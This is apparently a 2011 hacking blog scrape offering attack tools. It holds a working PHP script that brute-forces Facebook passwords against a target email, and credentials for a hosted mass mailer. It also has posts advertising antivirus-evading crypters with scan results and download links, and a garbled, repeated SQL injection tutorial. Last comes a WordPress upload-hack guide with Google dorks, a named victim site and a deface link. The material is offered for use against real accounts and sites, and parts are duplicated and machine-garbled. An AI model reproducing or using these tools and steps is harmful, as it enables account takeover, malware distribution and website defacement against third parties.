Hy guys I just hosted my php mass mailer so use it now ill update the script soon!!!!!!!!
Mass Mailer here
User: phpMM
Pass: phpMM
Mass Mailer here
User: phpMM
Pass: phpMM
Friday, December 30, 2011
[Free!][New!]FaceBook Bruteforce PHP script
Hello, first of all im not the coder 
To run it, you need a web server with apache
you need to edit the code, its easy, i think you will understand .
Enjoy
To run it, you need a web server with apache
you need to edit the code, its easy, i think you will understand .
PHP Code:
###############################
# Face Book Brute Forcer
################################
#Miracle-Ubers.org
################################set_time_limit(0); $username ="brute@force.org"; // username to brute force $dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){ $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; $data = "email=$kullaniciadi&pass=$sifre&login=Login" ; $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); $source=curl_exec ($ch); curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;} $lines=file($dictionary);
echo "Attack Starting..
"; sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){ $line=str_replace("\r","",$line); $line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
" ;$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
" ;}
} ?> Enjoy
Culito Sexy Crypter 1/36 {uffffffff}
Archivo: Sexy.exe
SHA1: 67b65bb7c6131929aaea6589ef8974ac368b6504
Fecha scan: 19-12-11,03:25:09
Resultado: 1/36
AVG Free Clean
ArcaVir Clean
Avast 5 Clean
Avast Clean
AntiVir (Avira) Clean
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Suspicious
A-Squared Clean
Quick Heal Antivirus Clean
Rising Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Webroot Internet Security Clean
Zoner AntiVirus Clean
Ad-Aware Clean
AhnLab V3 Internet Security Clean
BullGuard Clean
Immunet Antivirus Clean
http://www.multiupload.com/DQCLQ2F8KM
SHA1: 67b65bb7c6131929aaea6589ef8974ac368b6504
Fecha scan: 19-12-11,03:25:09
Resultado: 1/36
AVG Free Clean
ArcaVir Clean
Avast 5 Clean
Avast Clean
AntiVir (Avira) Clean
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Suspicious
A-Squared Clean
Quick Heal Antivirus Clean
Rising Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Webroot Internet Security Clean
Zoner AntiVirus Clean
Ad-Aware Clean
AhnLab V3 Internet Security Clean
BullGuard Clean
Immunet Antivirus Clean
http://www.multiupload.com/DQCLQ2F8KM
Archivo: server.exe
SHA1: 28aa3d7da55e305e50ca76c93966733eca4bb2cc
Size: 56281 Bytes
Fecha scan: 18-12-11,01:21:45
Resultado: 1/36
AVG Free Clean
ArcaVir Clean
Avast 5 Clean
Avast Clean
AntiVir (Avira) TR\/Dropper.Gen
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Clean
A-Squared Clean
Quick Heal Antivirus Clean
Rising Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Webroot Internet Security Clean
Zoner AntiVirus Clean
Ad-Aware Clean
AhnLab V3 Internet Security Clean
BullGuard Clean
Immunet Antivirus Clean
http://www.multiupload.com/LXIBUA1BKU
SHA1: 28aa3d7da55e305e50ca76c93966733eca4bb2cc
Size: 56281 Bytes
Fecha scan: 18-12-11,01:21:45
Resultado: 1/36
AVG Free Clean
ArcaVir Clean
Avast 5 Clean
Avast Clean
AntiVir (Avira) TR\/Dropper.Gen
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Clean
A-Squared Clean
Quick Heal Antivirus Clean
Rising Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Webroot Internet Security Clean
Zoner AntiVirus Clean
Ad-Aware Clean
AhnLab V3 Internet Security Clean
BullGuard Clean
Immunet Antivirus Clean
http://www.multiupload.com/LXIBUA1BKU
Crypter Lamborguini New (((FuD)))
Cyber
Fichero: sCybersssss.exe
Fecha/Hora: 11/12/2011 03:42:07 GMT +1
TamaƱo: 347765 Bytes
MD5: f26c37ad4b553e8fef1bdf1053b3ea32
SHA1: bc3d4d06a5a440d5c52e5b1bedbfe4dc3537c695
Detecciones: 0/36
Estado: LIMPIO
AVG Free - Limpio
ArcaVir - Limpio
Avast 5 - Limpio
Avast - Limpio
AntiVir (Avira) - Limpio
BitDefender - Limpio
VirusBuster Internet Security - Limpio
Clam Antivirus - Limpio
COMODO Internet Security - Limpio
Dr.Web - Limpio
eTrust-Vet - Limpio
F-PROT Antivirus - Limpio
F-Secure Internet Security - Limpio
G Data - Limpio
IKARUS Security - Limpio
Kaspersky Antivirus - Limpio
McAfee - Limpio
MS Security Essentials - Limpio
ESET NOD32 - Limpio
Norman - Limpio
Norton Antivirus - Limpio
Panda Security - Limpio
A-Squared - Limpio
Quick Heal Antivirus - Limpio
Rising Antivirus - Limpio
Solo Antivirus - Limpio
Sophos - Limpio
Trend Micro Internet Security - Limpio
VBA32 Antivirus - Limpio
Vexira Antivirus - Limpio
Webroot Internet Security - Limpio
Zoner AntiVirus - Limpio
Ad-Aware - Limpio
AhnLab V3 Internet Security - Limpio
BullGuard - Limpio
Imunitet Antivirus - Limpio
Down : http://www.multiupload.com/BPCZ9KTRE8
PASS :
6zNq6zNq9l1m0V9U8kLi1w//
Esab|B64|RV
Fichero: sCybersssss.exe
Fecha/Hora: 11/12/2011 03:42:07 GMT +1
TamaƱo: 347765 Bytes
MD5: f26c37ad4b553e8fef1bdf1053b3ea32
SHA1: bc3d4d06a5a440d5c52e5b1bedbfe4dc3537c695
Detecciones: 0/36
Estado: LIMPIO
AVG Free - Limpio
ArcaVir - Limpio
Avast 5 - Limpio
Avast - Limpio
AntiVir (Avira) - Limpio
BitDefender - Limpio
VirusBuster Internet Security - Limpio
Clam Antivirus - Limpio
COMODO Internet Security - Limpio
Dr.Web - Limpio
eTrust-Vet - Limpio
F-PROT Antivirus - Limpio
F-Secure Internet Security - Limpio
G Data - Limpio
IKARUS Security - Limpio
Kaspersky Antivirus - Limpio
McAfee - Limpio
MS Security Essentials - Limpio
ESET NOD32 - Limpio
Norman - Limpio
Norton Antivirus - Limpio
Panda Security - Limpio
A-Squared - Limpio
Quick Heal Antivirus - Limpio
Rising Antivirus - Limpio
Solo Antivirus - Limpio
Sophos - Limpio
Trend Micro Internet Security - Limpio
VBA32 Antivirus - Limpio
Vexira Antivirus - Limpio
Webroot Internet Security - Limpio
Zoner AntiVirus - Limpio
Ad-Aware - Limpio
AhnLab V3 Internet Security - Limpio
BullGuard - Limpio
Imunitet Antivirus - Limpio
Down : http://www.multiupload.com/BPCZ9KTRE8
PASS :
6zNq6zNq9l1m0V9U8kLi1w//
Esab|B64|RV
SQL injection courseSQL injection course
Some information on the Internet in search
of at least some of the SQL injection is often a matter of course or if
you are not satisfied with anything else, covering, or is that not
clear either, must have come across very short or articles. you and me
to grasp the subtleties of this gap on the subject of many articles
where we've collected 1-20. And then it did not harm others, remembering
to say, so I decided to write a FAQ on this issue fully. And once again
we ask. Those who will find something you missed in the wrong place,
so please otpishites below, all the same it is difficult, all to keep
in mind. In the meantime, this is my first post, and please do not throw
tomatoes, not kicked.
I will not do a SQL injection is probably not for you then know what is the first day of an article carried by breaking away. The necessary information so that the attacker was a query from the database, then changes to the database where the simple injection SQL injection attack is a type of the original query.
Assimilation is required for this article:
a) The presence of brain
b) Direct hands
a) Knowledge of SQL language
Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.
In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.
Each paragraph was important for the next item, etc., because the meantime, I recommend to read all
Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.
Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.
1.1 In the first case
script here
_http: / / xxx / news.php? Id = 1
Suppose the original request to the database as follows:
Note: SELECT * FROM news WHERE id = '1 ';
Quote Now append variable, therefore, such as "id"
_http: / / xxx / news.php? Id = 1 '
variable is not filtered and contains the error messages will appear something like this:
mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control
Since an extra query to the database might offer:
SELECT * FROM news WHERE id = '1'';
error reporting is turned off in this case, we would not be confused with such deficits in paragraph 1.4 (also does not prevent it, can determine the presence of. the same as described in
paragraph): _http: / / xxx / news.php? Id = 1 '; -
Will now query the database:
SELECT * FROM news WHERE id = '1 '; -';
(For those who tank "-" a sign of the beginning of all comments after it is thrown, it is still (so is written documentation, since that space must be sure that I would like to draw your attention to the fact that MySQL) and a road in front of him). Thus, for the MySQL query remains the same and looks the same
_http: / / xxx / news.php? Id = 1
I will not do a SQL injection is probably not for you then know what is the first day of an article carried by breaking away. The necessary information so that the attacker was a query from the database, then changes to the database where the simple injection SQL injection attack is a type of the original query.
Assimilation is required for this article:
a) The presence of brain
b) Direct hands
a) Knowledge of SQL language
Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.
In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.
Each paragraph was important for the next item, etc., because the meantime, I recommend to read all
Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.
Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.
1.1 In the first case
script here
_http: / / xxx / news.php? Id = 1
Suppose the original request to the database as follows:
Note: SELECT * FROM news WHERE id = '1 ';
Quote Now append variable, therefore, such as "id"
_http: / / xxx / news.php? Id = 1 '
variable is not filtered and contains the error messages will appear something like this:
mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control
Since an extra query to the database might offer:
SELECT * FROM news WHERE id = '1'';
error reporting is turned off in this case, we would not be confused with such deficits in paragraph 1.4 (also does not prevent it, can determine the presence of. the same as described in
paragraph): _http: / / xxx / news.php? Id = 1 '; -
Will now query the database:
SELECT * FROM news WHERE id = '1 '; -';
(For those who tank "-" a sign of the beginning of all comments after it is thrown, it is still (so is written documentation, since that space must be sure that I would like to draw your attention to the fact that MySQL) and a road in front of him). Thus, for the MySQL query remains the same and looks the same
_http: / / xxx / news.php? Id = 1
Easy Comment WordPress upload Vulnerability|10000 of wordpress sites vulnerable with
Hi
Guyz this is a Tutorial How to Hack WordPress, This is File Upload
Vulnerability , its not professional hacking tutorial but its a kind of
hacking trick, we will hack web site/wordpress through simple deface
page upload,
Follow step by step |
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads
This is Vulnerable Area http://www.findthepearl.com/wp-conte...mment-uploads/
Follow step by step |
- 1. Go to Google.com and paste this dork 3 Dorks
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads
- 2.Now you will Found hug of Web sites select any one web site or Open it
- 3. And Upload your Defacepage
- I paste dorks on Google and i found 5490 wordpress vulnerable web sites in 0.27 seconds [IMG]file:///C:/DOCUME%7E1/WINDOW%7E1/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image001.gif[/IMG]
“inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Index of /wp-content/plugins/easy-comment-uploads
- And i found this site :
This is Vulnerable Area http://www.findthepearl.com/wp-conte...mment-uploads/
- And upload your Defacepage image or txt file
- This is my Deface link : http://www.findthepearl.com/wp-conte...011/11/rox.txt
